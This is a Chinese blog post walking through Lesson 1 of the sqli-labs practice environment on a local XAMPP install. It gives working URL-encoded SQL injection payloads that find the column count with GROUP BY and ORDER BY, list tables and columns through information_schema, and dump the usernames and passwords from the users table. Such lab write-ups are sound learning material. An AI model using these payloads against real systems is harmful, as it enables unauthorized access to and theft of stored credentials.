sqli-labs--Lesson1

最近在看关于SQL注入的文章和书籍之类的东西，于是搭建了一个sqli-labs用来练习SQL手工注入。

首先我在https://gitlab.nefu.edu.cn/zyazhb/sqli-labs-PHP7/repository/master/archive.zip这个上面下载了sqli-labs，因为我的xampp（最新版）的PHP环境是PHP7。下载之后解压到htdocs目录下，就可以在浏览器中打开了。

1.

这是Lesson1打开后的初始页面，它让你输入ID：

那好，我在URL地址栏中输入http://localhost/sqli-labs/Less-1/?id=1,它正常显示了以下内容：

按照正常思路在后面输入'--%20(%20是空格的URL编码，如果没有空格MySQL会提示出错）进行验证，最后的URL地址栏中是这样的“http://localhost/sqli-labs/Less-1/?id=1%27--%20”：

页面没有发生任何变化，验证成功，下面就要构造注入语句了。

2.

先要搞清楚列数才能用union联合查询。有两种方法：

a.使用group by

在URL地址栏中输入http://localhost/sqli-labs/Less-1/?id=1%27 group by 1--%20，可以看出页面发生任何变化。

继续增加group by 后面的数字，增加到4，出现错误提示：

那么我在union联合查询时应该是3列。

b.使用order by 

这个方法与group by相似，在URL地址栏中输入http://localhost/sqli-labs/Less-1/?id=1%27%20order%20by%201--%20，页面正常。

增加order by后面的数字，同样增加到4，页面报错。

3.

先在地址栏中键入http://localhost/sqli-labs/Less-1/?id=%27%20union%20select%201,2,3--%20

显示的是2和3，那么后面我的SQL注入语句的重点应该放在2,3的位置上。

首先通过information_schema.tables获取数据表的元数据信息：

http://localhost/sqli-labs/Less-1/?id=%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--%20

可以看到当前数据库中的表，关于group_concat的用法解释及information.tables看我下面的参考文章。

下面去“查询”users表中的内容，其他的表方法也是一样：

http://localhost/sqli-labs/Less-1/?id=%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27%20%20--%20

然后“查询”username，password的内容：

http://localhost/sqli-labs/Less-1/?id=%27%20union%20select%201,group_concat(username),group_concat(password)%20from%20users%20%20--%20

参考文章：

bbs.pediy.com/thread-218235.htm

group_concat的用法：https://www.cnblogs.com/huzi007/p/4670715.html

limit的用法：https://www.cnblogs.com/wangxingliu/p/3512188.html

元数据库：https://www.cnblogs.com/ssslinppp/p/6178636.html